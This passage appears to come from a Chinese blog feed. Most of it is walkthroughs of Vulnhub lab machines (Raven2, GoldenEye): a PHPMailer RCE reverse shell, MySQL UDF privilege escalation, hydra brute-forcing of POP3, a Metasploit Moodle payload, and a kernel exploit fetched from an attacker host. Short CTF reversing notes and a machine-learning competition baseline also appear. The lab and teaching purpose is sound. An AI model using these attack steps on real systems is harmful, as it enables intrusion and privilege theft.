/wordpress</p> <p>从上往下一个一个的访问,访问到/vendor 时,返回了/vendor 的目录索引</p> <p><img src="/images/20240717_1721216933-image.png" alt="" /></p> <p>在PATH下找到第一个flag</p> <p><img src="/images/20240717_1721216973-image.png" alt="" /></p> <p>flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}</p> <p>目录索引里有PHPMailerAutoload.php,应该是安装了PHPMailer</p> <p><img src="/images/20240717_1721217098-image.png" alt="" /></p> <p>这里写一下什么是PHPMailer</p> <p>PHPMailer 是一个广泛使用的PHP库,用于发送电子邮件。它提供了一种简单而强大的方式来使用PHP发送邮件,并支持许多功能,如:</p> <ol> <li><strong>SMTP</strong> :支持通过SMTP服务器发送邮件,这使得邮件发送更为可靠和专业。</li> <li><strong>HTML邮件</strong> :允许发送带有HTML内容的邮件,支持丰富的文本格式和嵌入图片。</li> <li><strong>附件</strong> :可以方便地添加文件附件到邮件中。</li> <li><strong>多语言支持</strong> :支持多种语言的邮件内容和错误信息。</li> <li><strong>安全性</strong> :支持SSL和TLS加密,确保邮件传输的安全性。</li> <li><strong>定制化</strong> :可以设置发件人、收件人、主题、正文等多种邮件属性。</li> </ol> <p>PHPMailer 是许多PHP项目中常用的邮件发送解决方案,因为它比PHP内置的<code>mail()</code>函数更为灵活和功能丰富。</p> <p>点击VERSION,看到PHPMailer的版本为5.2.16</p> <p><img src="/images/20240717_1721217278-image.png" alt="" /></p> <p>搜索引擎搜索能看到这个版本有远程执行代码漏洞<a href="https://blog.csdn.net/qq_37602797/article/details/112018515">PHPMailer远程命令执行漏洞复现_phpmailer 5.2.10-CSDN博客</a>,但是没找到PHPMailer的访问端口,作罢</p> <p>直接搜索PHPMailer 5.2.16 exp,找到了一个exp,<a href="https://www.exploit-db.com/exploits/40974">PHPMailer &lt; 5.2.18 - Remote Code Execution - PHP webapps Exploit (exploit-db.com)</a>,wordpress的CVE-2016-10033<a href="https://xz.aliyun.com/t/2301?time__1311=n4%2Bxni0%3DG%3DDtM4mTe05DKf4YqruwC%3D1O4D">WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)复现分析 - 先知社区 (aliyun.com)</a> ,通过邮件漏洞进行反弹shell</p> <p>在kali里面找exp脚本,<code>searchsploit 40974</code></p> <p><img src="/images/20240717_1721221299-image.png" alt="" /></p> <p>复制到桌面,<code>cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/桌面</code></p> <p>然后去访问一下/wordpress ,发现重定向到了一个网址raven.local</p> <p><img src="/images/20240717_1721218210-image.png" alt="" /></p> <p>应该是要本地ip绑定域名进行访问,修改hosts文件</p> <p><img src="/images/20240717_1721220620-image.png" alt="" /></p> <p>访问raven.local/wordpress ,进入到wordpress的主界面</p> <p><img src="/images/20240717_1721220667-image.png" alt="" /></p> <p>邮件服务在 <a href="http://192.168.199.134/contact.php">/contact.php</a> 下</p> <p><img src="/images/20240717_1721222212-image.png" alt="" /></p> <p>编辑脚本,修改为对应的参数</p> <p><img src="/images/20240717_1721223523-image.png" alt="" /></p> <p>先监听到本地的4444端口<code>nc -lvp 4444</code></p> <p>再执行exp<code>python3 40974.py</code></p> <p><img src="/images/20240717_1721223483-image.png" alt="" /></p> <p>先访问<a href="http://192.168.199.134/contact.php">http://192.168.199.134/contact.php</a> 去生成后门文件test.php 再去访问<a href="http://192.168.199.134/contact.php">http://192.168.199.134/test.php</a> 进行反弹shell</p> <p><img src="/images/20240717_1721227019-image.png" alt="" /></p> <p>执行</p> <p><img src="/images/20240717_1721227259-image.png" alt="" /></p> <p>进行提权</p> <p>使用<code>find / -name flag*</code> 查找flag,找到了flag2.txt和flag3.png</p> <p><img src="/images/20240717_1721227379-image.png" alt="" /></p> <pre><code>cat /var/www/flag2.txt //查看flag2 </code></pre> <p><img src="/images/20240717_1721227475-image.png" alt="" /></p> <p>flag2{6a8ed560f0b5358ecf844108048eb337}</p> <p>浏览器访问<a href="http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png">http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png</a> 查看flag3</p> <p><img src="/images/20240717_1721227562-image.png" alt="" /></p> <p>cd /var/www/html/wordpress 跟进带wp目录下,cat wp-config.php 查看wp的配置文件,拿到数据库的数据库名和密码</p> <p><img src="/images/20240717_1721227956-image.png" alt="" /></p> <p><code>ps -aux | grep root </code>能看到mysql是以root权限运行的</p> <p><img src="/images/20240717_1721229217-image.png" alt="" /></p> <p>那就要想想数据库提权了</p> <p><code>dpkg -l | grep mysql</code> 查看mysql的历史安装包版本</p> <p><img src="/images/20240717_1721229421-image.png" alt="" /></p> <p>mysql版本为5.5.6</p> <p>udf提权</p> <p>kali查找udf的脚本</p> <p><img src="/images/20240717_1721229731-image.png" alt="" /></p> <p>复制到桌面进行编译</p> <pre><code>gcc -g -c 1518.c gcc -g -shared -o icepeak.so 1518.o -lc python -m http.server 8081 本地拉起http服务使用wget命令讲编译好的.so文件上传到靶机 ![](/images/20240717_HSKumHSxCFUAAAAASUVORK5CYII_.jpg) </code></pre> <p>mysql -uroot -pR@v3nSecurity 连接数据库</p> <p>show global variables like 'secure%'; 查看是否具有写入权限</p> <p><img src="/images/20240717_CLy4AAAAAAElFTkSuQmCC.jpg" alt="" /></p> <p>有读写权限</p> <pre><code>use mysql; 进入数据库 create table foo(line blob); 创建数据表foo insert into foo values(load_file('/var/www/html/wordpress/icepeak.so')); 插入数据 select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; ( Foo表成功插入二进制数据,然后利用dumpfile函数把文件导出outfile 多行导出,dumpfile一行导出 outfile会有特殊的转换,而dumpfile是原数据导出新建存储函数) create function do_system returns integer soname 'icepeak.so'; (创建自定义函数do_system 类型是integer,别名soname文件名字然后查询函数是否创建成功) select * from mysql.func; select do_system('chmod u+s /usr/bin/find'); (调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令) quit </code></pre> <p><img src="/images/20240717_1721231005-image.png" alt="" /></p> <p>使用/usr/bin/find提权找flag</p> <p><img src="/images/20240717_1721231384-image.png" alt="" /></p> <p>权限已经为root</p> <p><img src="/images/20240717_1721231437-image.png" alt="" /></p> <p>得到flag4</p> <p>flag4{df2bc5e951d91581467bb9a2a8ff4425}</p> <p>参考文档</p> <p><a href="https://www.cnblogs.com/heiyu-sec/p/16329175.html">【原创】项目三Raven-2 - 黑羽heiyu - 博客园 (cnblogs.com)</a></p> <p><a href="https://blog.csdn.net/kukudeshuo/article/details/118888664">vulnhub靶场,Raven2_raven2靶场-CSDN博客</a></p> goldeneye wphttps://blog.fiveqm.com/archives/178/https://blog.fiveqm.com/archives/178/先用nmap把部署再VM里的靶机ip扫出来 nmap -sn 192.168.199.1-254我的靶机网络设置为net,子网ip为192.168.199.0 靶机ip为192.168.199.133 端口扫描 nmap -p- 192.168.199.133 这里55006和55007是pop3的...Mon, 15 Jul 2024 15:05:02 GMT<p>先用nmap把部署再VM里的靶机ip扫出来</p> <p><code>nmap -sn 192.168.199.1-254</code>(我的靶机网络设置为net,子网ip为192.168.199.0)</p> <p><img src="/images/20240715_1721047370-5e825db391c3d80a1c7aebfd5155776f.png" alt="" /></p> <p>靶机ip为192.168.199.133</p> <p>端口扫描</p> <p><code>nmap -p- 192.168.199.133</code></p> <p><img src="/images/20240715_1721047732-image.png" alt="" /></p> <p>这里55006和55007是pop3的端口</p> <p>浏览器访问</p> <p><img src="/images/20240715_1721047444-image.png" alt="" /></p> <p>提示访问<a href="http://192.168.199.133/sev-home/">http://192.168.199.133/sev-home/</a>去登录</p> <p><img src="/images/20240715_1721047548-image.png" alt="" /></p> <p>我已经登陆过,所以保存了账号密码</p> <p>F12查看网页源码</p> <p><img src="/images/20240715_1721047856-image.png" alt="" /></p> <p>看一下这个js文件</p> <p><img src="/images/20240715_1721047898-image.png" alt="" /></p> <p>得到了账号和密码</p> <p>这里注意,用户名是小写的,密码需要解密</p> <p><img src="/images/20240715_1721047985-image.png" alt="" /></p> <p>用户名:boris 密码:InvincibleHack3r</p> <p>登录得到</p> <p><img src="/images/20240715_1721048099-image.png" alt="" /></p> <p>翻译一下</p> <p><img src="/images/20240715_1721048129-image.png" alt="" /></p> <p>F12看一下源码</p> <p><img src="/images/20240715_1721048475-image.png" alt="" /></p> <p>这里得到了两个用户名Natalya Boris</p> <p>端口扫描就扫出了两个非常高的端口,55006和55007</p> <p>分别访问后发现,只有55007能够访问</p> <p><img src="/images/20240715_1721048297-image.png" alt="" /></p> <p>通过Hydra 暴力破解 pop3 服务,把得到的用户名和kali的fasttrack.txt 词表结合对密码进行破解</p> <pre><code>hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.199.133 -s 55007 pop3 hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.199.133 -s 55007 pop3 </code></pre> <p><img src="/images/20240715_1721049283-image.png" alt="" /> <img src="/images/20240715_1721049302-image.png" alt="" /></p> <p>然后通过nc去连接pop3服务,通过账号密码登录邮件服务</p> <pre><code>USER boris//输入用户名 PASS secret1!//输入密码 list//列出邮件 </code></pre> <p><img src="/images/20240715_1721049551-image.png" alt="" /></p> <p>通过retr命令查看邮件</p> <p>在natalya的第二封邮件里发现了一些信息</p> <p><img src="/images/20240715_1721051030-image.png" alt="" /></p> <ol> <li>用户名:xenia</li> <li>密码:RCP90rulez!</li> <li>域名:severnaya-station.com</li> <li>网址:severnaya-station.com/gnocertdir</li> </ol> <p>还需要修改linux的/etc/hosts文件,绑定域名</p> <p>这里将本机靶机的ip和域名进行绑定</p> <pre><code>gedit /etc/hosts </code></pre> <p><img src="/images/20240715_1721051484-image.png" alt="" /></p> <p>访问<a href="http://severnaya-station.com/gnocertdir/">http://severnaya-station.com/gnocertdir/</a></p> <p><img src="/images/20240715_1721051710-image.png" alt="" /></p> <p>根据得到的用户名和密码进行登录</p> <p><img src="/images/20240715_1721051904-image.png" alt="" /> <img src="/images/20240715_1721051978-image.png" alt="" /></p> <p>在一短信中发现有提到用户名</p> <p><img src="/images/20240715_1721052102-image.png" alt="" /></p> <p>用Hydra 暴力破解一下密码</p> <pre><code>hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.199.133 -s 55007 pop3 </code></pre> <p><img src="/images/20240715_1721052517-image.png" alt="" /></p> <p>密码:goat</p> <p>在次nc连接pop3</p> <p><img src="/images/20240715_1721052710-image.png" alt="" /></p> <p>拿到用户名和密码</p> <p>username: dr_doak<br /> password: 4England!</p> <p>再次登录<a href="http://severnaya-station.com/gnocertdir/">http://severnaya-station.com/gnocertdir/</a></p> <p>在旁边的文件夹里发现一个txt文件</p> <p><img src="/images/20240715_1721052917-image.png" alt="" /></p> <p>下载下来打开发现一个一个图片的地址</p> <p><img src="/images/20240715_1721053050-image.png" alt="" /></p> <p>访问一下</p> <p><img src="/images/20240715_1721053111-image.png" alt="" /></p> <p>直接看图片看不出来什么,把图片下载下来</p> <p><img src="/images/20240715_1721053270-image.png" alt="" /></p> <p>发现了一串base64加密的文本</p> <p><img src="/images/20240715_1721053341-image.png" alt="" /></p> <p>解码得到xWinter1995x!</p> <p>管理员用户名:admin 密码:xWinter1995x!</p> <p>再次登录<a href="http://severnaya-station.com/gnocertdir/">http://severnaya-station.com/gnocertdir/</a> 以管理员的身份</p> <p><img src="/images/20240715_1721053908-image.png" alt="" /></p> <p>看到Moodle的版本是2.2.3</p> <p>使用msf进行getshell</p> <pre><code>msfconsole ---进入MSF框架攻击界面 search moodle ---查找 moodle类型 攻击的模块 use 1 ---调用1 exploit/multi/http/moodle_spelling_binary_rce调用攻击脚本 set username admin ---设置用户名:admin set password xWinter1995x! ---设置密码:xWinter1995x! set rhost severnaya-station.com ---设置:rhosts severnaya-station.com set targeturi /gnocertdir ---设置目录: /gnocertdir set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse set lhost 192.168.199.128 ---设置:lhost ip exploit ----执行命令 </code></pre> <p><img src="/images/20240715_1721054485-image.png" alt="" /></p> <p>这是执行失败是因为没有开启PSpellShell</p> <p>我们用管理员账户开启PSpellShell</p> <p><img src="/images/20240715_1721054598-image.png" alt="" /></p> <p>再次执行命令</p> <p><img src="/images/20240715_1721055092-image.png" alt="" /></p> <p>出错了,发现是ip设置错了,修改ip后,再次执行</p> <p><img src="/images/20240715_1721055112-image.png" alt="" /></p> <p>拿到shell</p> <p>执行tty</p> <p><img src="/images/20240715_1721056405-image.png" alt="" /> <img src="/images/20240715_1721055307-image.png" alt="" /></p> <p>python反弹shell</p> <p><img src="/images/20240715_1721056418-image.png" alt="" /></p> <p>将代码替换到Path to aspell,ip为本地ip</p> <p><img src="/images/20240715_4kbQAAAABJRU5ErkJggg__.jpg" alt="" /></p> <p>先监听在10086端口</p> <p><img src="/images/20240715_1721056688-image.png" alt="" /></p> <p>再在下图处进行反弹shell</p> <p><img src="/images/20240715_1721056777-image.png" alt="" /></p> <p>再次执行tty</p> <p><img src="/images/20240715_1721056812-image.png" alt="" /> <img src="/images/20240715_1721056834-image.png" alt="" /></p> <p>uname -a查看权限</p> <p><img src="/images/20240715_1721056888-image.png" alt="" /></p> <p>搜索linux ubuntu 3.13.0-32 exploit 找到exp <a href="https://www.exploit-db.com/exploits/37292">Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit (exploit-db.com)</a></p> <p>searchsploit 37292 搜索本地的exp</p> <p><img src="/images/20240715_1721057149-image.png" alt="" /></p> <p>cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面</p> <p>将exp复制到桌面</p> <p>靶机没有gcc</p> <p><img src="/images/20240715_1721057357-image.png" alt="" /></p> <p>但是存在 cc 环境需要改下脚本为 cc</p> <p>gedit 37292.c</p> <p><img src="/images/20240715_1721057457-image.png" alt="" /></p> <p>然后在本地目录下开启 http 服务</p> <p>python -m http.server 8081</p> <p><img src="/images/20240715_1721057591-image.png" alt="" /></p> <p>先通过 wget 下载文件到靶机</p> <p>wget http://192.168.199.128:8081/37292.c</p> <p><img src="/images/20240715_1721057738-image.png" alt="" /></p> <p>编译 cc -o exp 37292.c</p> <p><img src="/images/20240715_1721057865-image.png" alt="" /></p> <p>添加执行权限 chmod +x exp<br /> 执行 ./exp</p> <p><img src="/images/20240715_1721057915-image.png" alt="" /></p> <p>查看当前权限 id</p> <p><img src="/images/20240715_1721057954-image.png" alt="" /></p> <p>读flag cat /root/.flag.txt</p> <p><img src="/images/20240715_1721057987-image.png" alt="" /></p> <p>flag 568628e0d993b1973adc718237da6e93</p> <p>参考文档</p> <p><a href="https://www.freebuf.com/articles/web/288555.html">Vulnhub——1-GoldenEye复现 - FreeBuf网络安全行业门户</a></p> <p><a href="https://blog.csdn.net/weixin_53730939/article/details/135233762">vulnhub-GoldenEye靶机通关(超详细)_goldeneye靶场-CSDN博客</a></p> <p><a href="https://blog.csdn.net/liuhyusb/article/details/131591657">【网络安全】手把手给大家演练渗透项目_linux ubuntu 3.13.0-32 exploit-CSDN博客</a></p> datawhale笔记|分子预测大模型竞赛-baseline精读分享|笔记onehttps://blog.fiveqm.com/archives/158/https://blog.fiveqm.com/archives/158/1.需要会使用Python一些基本的库 如 os sys re numpy之类的 这里知道了一个新库rdkit,这是一个用于处理化学结构的库 时间和期末考试时间冲突了5号会吧笔记补充完整 库引用部分 import numpy as np import pandas as pd from catboo...Thu, 04 Jul 2024 11:16:01 GMT<p>1.需要会使用Python一些基本的库</p> <p>如 os sys re numpy之类的 这里知道了一个新库rdkit,这是一个用于处理化学结构的库</p> <p><s>时间和期末考试时间冲突了5号会吧笔记补充完整</s></p> <p>库引用部分</p> <pre><code>import numpy as np import pandas as pd from catboost import CatBoostClassifier from sklearn.model_selection import StratifiedKFold, KFold, GroupKFold from sklearn.metrics import f1_score from rdkit import Chem from rdkit.Chem import Descriptors from sklearn.feature_extraction.text import TfidfVectorizer import tqdm, sys, os, gc, re, argparse, warnings warnings.filterwarnings('ignore') </code></pre> <p>2.数据预处理部分</p> <pre><code>train = pd.read_excel('./dataset-new/traindata-new.xlsx') test = pd.read_excel('./dataset-new/testdata-new.xlsx') # test数据不包含 DC50 (nM) 和 Dmax (%) train = train.drop(['DC50 (nM)', 'Dmax (%)'], axis=1) # 定义了一个空列表drop_cols,用于存储在测试数据集中非空值小于10个的列名。 drop_cols = [] for f in test.columns: if test[f].notnull().sum() &lt; 10: drop_cols.append(f) # 使用drop方法从训练集和测试集中删除了这些列,以避免在后续的分析或建模中使用这些包含大量缺失值的列 train = train.drop(drop_cols, axis=1) test = test.drop(drop_cols, axis=1) # 使用pd.concat将清洗后的训练集和测试集合并成一个名为data的DataFrame,便于进行统一的特征工程处理 data = pd.concat([train, test], axis=0, ignore_index=True) cols = data.columns[2:] drop_cols = [] for f in test.columns: if test[f].notnull().sum() &lt; 10: drop_cols.append(f) </code></pre> <p>此处不删除数据,可以提升精度,但是需要对数据进行更加精细的分析</p> <p>3.特征工程</p> <pre><code># 将SMILES转换为分子对象列表,并转换为SMILES字符串列表 data['smiles_list'] = data['Smiles'].apply(lambda x:[Chem.MolToSmiles(mol, isomericSmiles=True) for mol in [Chem.MolFromSmiles(x)]]) data['smiles_list'] = data['smiles_list'].map(lambda x: ' '.join(x)) # 使用TfidfVectorizer计算TF-IDF tfidf = TfidfVectorizer(max_df = 0.9, min_df = 1, sublinear_tf = True) res = tfidf.fit_transform(data['smiles_list']) # 将结果转为dataframe格式 tfidf_df = pd.DataFrame(res.toarray()) tfidf_df.columns = [f'smiles_tfidf_{i}' for i in range(tfidf_df.shape[1])] # 按列合并到data数据 data = pd.concat([data, tfidf_df], axis=1) # 自然数编码 def label_encode(series): unique = list(series.unique()) return series.map(dict(zip( unique, range(series.nunique()) ))) for col in cols: if data[col].dtype == 'object': data[col] = label_encode(data[col]) train = data[data.Label.notnull()].reset_index(drop=True) test = data[data.Label.isnull()].reset_index(drop=True) # 特征筛选 features = [f for f in train.columns if f not in ['uuid','Label','smiles_list']] # 构建训练集和测试集 x_train = train[features] x_test = test[features] # 训练集标签 y_train = train['Label'].astype(int) </code></pre> <p>代码执行了以下步骤:</p> <ol> <li><strong>SMILES转换</strong> :使用RDKit库将数据集中的SMILES字符串转换回SMILES字符串的列表。这里看起来有些冗余,因为您已经拥有SMILES字符串,但可能您想确保所有SMILES都是以相同的方式(例如,考虑异构体信息)处理的。</li> <li><strong>字符串处理</strong> :将SMILES字符串列表转换为单个字符串,每个SMILES之间用空格分隔。</li> <li><strong>TF-IDF计算</strong> :使用<code>TfidfVectorizer</code>从处理后的SMILES字符串创建TF-IDF特征矩阵。</li> <li><strong>转换为DataFrame</strong> :将TF-IDF矩阵转换为DataFrame,以便与原始数据集结合。</li> <li><strong>自然数编码</strong> :定义了一个函数<code>label_encode</code>,用于将分类特征(对象类型)转换为整数编码。</li> <li><strong>特征和标签准备</strong> : <ol> <li>对于所有的特征列(<code>cols</code>),如果它们的数据类型是对象(通常表示为字符串),则应用自然数编码。</li> <li>从合并后的数据集中分离出训练集和测试集,其中训练集包含标签(<code>Label</code>),测试集不包含。</li> </ol> </li> <li><strong>特征和标签的筛选</strong> :从训练集和测试集中筛选出特征列(不包括<code>uuid</code>、<code>Label</code>和<code>smiles_list</code>),并从训练集中提取标签列。</li> <li><strong>数据类型转换</strong> :将标签列<code>Label</code>转换为整数类型,以便于模型训练。</li> </ol> <p>3.模型训练与预测</p> <pre><code>def cv_model(clf, train_x, train_y, test_x, clf_name, seed=2022): kf = KFold(n_splits=5, shuffle=True, random_state=seed) train = np.zeros(train_x.shape[0]) test = np.zeros(test_x.shape[0]) cv_scores = [] # 100, 1 2 3 4 5 # 1 2 3 4 5 # 1 2 3 5。 4 # 1 for i, (train_index, valid_index) in enumerate(kf.split(train_x, train_y)): print('************************************ {} {}************************************'.format(str(i+1), str(seed))) trn_x, trn_y, val_x, val_y = train_x.iloc[train_index], train_y[train_index], train_x.iloc[valid_index], train_y[valid_index] params = {'learning_rate': 0.1, 'depth': 6, 'l2_leaf_reg': 10, 'bootstrap_type':'Bernoulli','random_seed':seed, 'od_type': 'Iter', 'od_wait': 100, 'allow_writing_files': False, 'task_type':'CPU'} model = clf(iterations=20000, **params, eval_metric='AUC') model.fit(trn_x, trn_y, eval_set=(val_x, val_y), metric_period=100, cat_features=[], use_best_model=True, verbose=1) val_pred = model.predict_proba(val_x)[:,1] test_pred = model.predict_proba(test_x)[:,1] train[valid_index] = val_pred test += test_pred / kf.n_splits cv_scores.append(f1_score(val_y, np.where(val_pred&gt;0.5, 1, 0))) print(cv_scores) print("%s_score_list:" % clf_name, cv_scores) print("%s_score_mean:" % clf_name, np.mean(cv_scores)) print("%s_score_std:" % clf_name, np.std(cv_scores)) return train, test cat_train, cat_test = cv_model(CatBoostClassifier, x_train, y_train, x_test, "cat") pd.DataFrame( { 'uuid': test['uuid'], 'Label': np.where(cat_test&gt;0.5, 1, 0) } ).to_csv('submit.csv', index=None) </code></pre> <p>代码定义了一个名为 <code>cv_model</code> 的函数,用于使用交叉验证训练分类模型,并对测试集进行预测。以下是代码的详细步骤和说明:</p> <ol> <li><strong>函数定义</strong> :<code>cv_model</code> 函数接受分类器对象 <code>clf</code>,训练特征集 <code>train_x</code> 和标签集 <code>train_y</code>,测试特征集 <code>test_x</code>,分类器名称 <code>clf_name</code>,以及可选的随机种子 <code>seed</code>。</li> <li><strong>交叉验证设置</strong> :使用 <code>KFold</code> 进行5折交叉验证,<code>shuffle=True</code> 表示在分折前打乱数据。</li> <li><strong>初始化变量</strong> :创建两个数组 <code>train</code> 和 <code>test</code> 来存储交叉验证过程中的训练集预测和测试集预测。</li> <li><strong>循环执行交叉验证</strong> : <ol> <li>对每一折数据,使用训练索引 <code>train_index</code> 和验证索引 <code>valid_index</code> 分割训练集和验证集。</li> <li>打印当前折数和随机种子。</li> <li>设置 CatBoost 分类器的参数 <code>params</code>。</li> </ol> </li> <li><strong>模型训练</strong> :使用 CatBoost 分类器训练模型,<code>iterations=20000</code> 表示最大迭代次数,<code>eval_metric='AUC'</code> 表示使用 AUC 作为评估指标。</li> <li><strong>模型评估</strong> : <ol> <li>使用验证集 <code>val_x</code> 和 <code>val_y</code> 对模型进行评估,获取预测概率 <code>val_pred</code>。</li> <li>使用测试集 <code>test_x</code> 获取测试集预测概率 <code>test_pred</code>。</li> </ol> </li> <li><strong>保存结果</strong> :将验证集的预测结果存储在 <code>train</code> 数组中,将测试集的预测结果累加到 <code>test</code> 数组中,并计算当前折的 F1 分数。</li> <li><strong>输出结果</strong> :打印所有折的 F1 分数、平均值和标准差。</li> <li><strong>返回结果</strong> :返回训练集预测结果 <code>train</code> 和测试集预测结果 <code>test</code>。</li> <li><strong>模型应用</strong> : 1. 使用 <code>cv_model</code> 函数训练 CatBoost 分类器,并将返回的测试集预测结果 <code>cat_test</code> 用于生成提交文件。 2. 根据预测概率 <code>cat_test</code> 生成二元标签,概率大于0.5的预测为1,否则为0。</li> <li><strong>生成提交文件</strong> :创建一个包含 <code>uuid</code> 和预测标签 <code>Label</code> 的 DataFrame,并将其保存为 CSV 文件。</li> </ol> <p>官方学习文档<a href="https://datawhaler.feishu.cn/wiki/YgNbwUJHKiMuCekhoZ9cEzgxnZc">https://datawhaler.feishu.cn/wiki/YgNbwUJHKiMuCekhoZ9cEzgxnZc</a></p> 第十五届蓝桥杯-软件赛网络安全赛项(个人赛)https://blog.fiveqm.com/archives/120/https://blog.fiveqm.com/archives/120/以下只是我做出来的题 爬虫协议 点击 即可得到flag cc 直接用CyberChef反向解密即可得到flag rc4 用exeinfope.exe查看是32位无壳文件 直接用ida32打开 下面是rc4解密的过程,我直接在返回结果的地方打断点 在寄存器里找到了flag Packet 这是一道she...Sat, 27 Apr 2024 11:25:58 GMT<p>以下只是我做出来的题</p> <p>爬虫协议</p> <p><img src="/images/20240427_1714201978-image.png" alt="" /> <img src="/images/20240427_1714202014-image.png" alt="" /></p> <p>点击</p> <p><img src="/images/20240427_1714202019-image.png" alt="" /></p> <p>即可得到flag</p> <p><img src="/images/20240427_1714202026-image.png" alt="" /></p> <p>cc</p> <p><img src="/images/20240427_1714202033-image.png" alt="" /></p> <p>直接用CyberChef反向解密即可得到flag</p> <p>rc4</p> <p>用exeinfope.exe查看是32位无壳文件</p> <p><img src="/images/20240427_1714202039-image.png" alt="" /></p> <p>直接用ida32打开</p> <p><img src="/images/20240427_1714202059-image.png" alt="" /> <img src="/images/20240427_1714202074-image.png" alt="" /></p> <p>下面是rc4解密的过程,我直接在返回结果的地方打断点</p> <p><img src="/images/20240427_1714202081-image.png" alt="" /></p> <p>在寄存器里找到了flag</p> <p><img src="/images/20240427_1714202088-image.png" alt="" /></p> <p>Packet</p> <p>这是一道shell的流量分析</p> <p><img src="/images/20240427_1714202093-image.png" alt="" /></p> <p>这里执行/shell.php?1337=system('ls'); 回显出</p> <p><img src="/images/20240427_1714202101-image.png" alt="" /> <img src="/images/20240427_1714202106-image.png" alt="" /></p> <p>这里执行/shell.php?1337=system('ls /'); 回显出</p> <p><img src="/images/20240427_1714202109-image.png" alt="" /></p> <p>这里我们在回显中看到了flag</p> <p><img src="/images/20240427_1714202123-image.png" alt="" /></p> <p>这了执行了/shell.php?1337=system('cat /flag |base64 -w 0'); ,将flag base64加密后返回</p> <p><img src="/images/20240427_1714202131-image.png" alt="" /></p> <p>这里找到了base64加密后的flag</p> <p>Base64解密后即可得到flag</p> <p><img src="/images/20240427_1714202138-image.png" alt="" /></p> <p>Theorem</p> <p>使用轩禹CTF_RSA工具3.6.1,这个工具可以分解p,q并且计算d,最后求出m并转字符串</p> <p><img src="/images/20240427_1714202143-image.png" alt="" /> <img src="/images/20240427_1714202147-image.png" alt="" /> <img src="/images/20240427_1714202153-image.png" alt="" /></p> 攻防世界-AndroidRE-app1https://blog.fiveqm.com/archives/107/https://blog.fiveqm.com/archives/107/先用jeb查看伪代码 这是一个简单的异或运算 将VERSION_CODE与VERSION_NAME进行异或,在BuildConfig中可以找到这两个字符串 Kotlin异或代码如下 fun main{ val VERSION_CODE = 15 val VERSION_NAME = "X<cP?PH...Wed, 17 Apr 2024 06:09:22 GMT<p>先用jeb查看伪代码</p> <p><img src="/images/20240417_1713333843-image.png" alt="" /></p> <p>这是一个简单的异或运算</p> <p><img src="/images/20240417_1713333979-image.png" alt="" /></p> <p>将VERSION_CODE与VERSION_NAME进行异或,在BuildConfig中可以找到这两个字符串</p> <p><img src="/images/20240417_1713334110-image.png" alt="" /></p> <p>Kotlin异或代码如下</p> <pre><code>fun main(){ val VERSION_CODE = 15 val VERSION_NAME = "X&lt;cP[?PHNB&lt;P?aj" for(i in VERSION_NAME){ var Name_ascii = i.toInt() var result = Name_ascii xor VERSION_CODE print(result.toChar()) } } </code></pre> i春秋-Re-XORhttps://blog.fiveqm.com/archives/73/https://blog.fiveqm.com/archives/73/首先使用exeinfope查壳 发现并没有壳,但是是64位的linux的ELF文件,可能会涉及大小端问题 有ida反编译后找到mian函数进行反编译 v5和s2的地址临近 所以v5其实是s25 python脚本如下 硬编码的字节序列,对应于C代码中的s2数组和v5变量 这里我们将每个64位整数按小...Fri, 12 Apr 2024 11:50:42 GMT<p>首先使用exeinfope查壳</p> <p><img src="/images/20240412_1712922703-QQ%E6%88%AA%E5%9B%BE20240411215438.png" alt="" /></p> <p>发现并没有壳,但是是64位的linux的ELF文件,可能会涉及大小端问题</p> <p>有ida反编译后找到<strong>mian函数</strong> 进行反编译</p> <p><img src="/images/20240412_1712924774-image.png" alt="" /></p> <p>v5和s2的地址临近</p> <p><img src="/images/20240412_1712925561-image.png" alt="" /></p> <p>所以v5其实是s2[5]</p> <p>python脚本如下</p> <pre><code># 硬编码的字节序列,对应于C代码中的s2数组和v5变量 # 这里我们将每个64位整数按小端字节序转换为字节序列encrypted_bytes = [ 0x35, 0x29, 0x02, 0x35, 0x3E, 0x35, 0x0F, 0x60, # s2[0] 0x20, 0x06, 0x64, 0x26, 0x65, 0x1A, 0x61, 0x77, # s2[1] 0x5A, 0x64, 0x68, 0x60, 0x53, 0x60, 0x20, 0x4E, # s2[2] 0x6B, 0x21, 0x67, 0x54, 0x7E, 0x71, 0x51, 0x64, # s2[3] 0x75, 0x60, 0x51, 0x64, 0x73, 0x05, 0x65, 0x21, # s2[4] 0x61, 0x4A # v5]# 循环使用的密钥key = "SEcRET7"# 解密函数def decrypt(encrypted, key): decrypted = "" key_length = len(key) for i, byte in enumerate(encrypted): decrypted_char = byte ^ ord(key[i % key_length]) decrypted += chr(decrypted_char) return decrypted# 解密并打印结果original_input = decrypt(encrypted_bytes, key)print(f"The original input was: {original_input}") </code></pre> <p>`</p> 世界,您好!https://blog.fiveqm.com/archives/1/https://blog.fiveqm.com/archives/1/欢迎使用 WordPress。这是您的第一篇文章。编辑或删除它,然后开始写作吧!Wed, 20 Mar 2024 03:56:50 GMT<p>欢迎使用 WordPress。这是您的第一篇文章。编辑或删除它,然后开始写作吧!</p>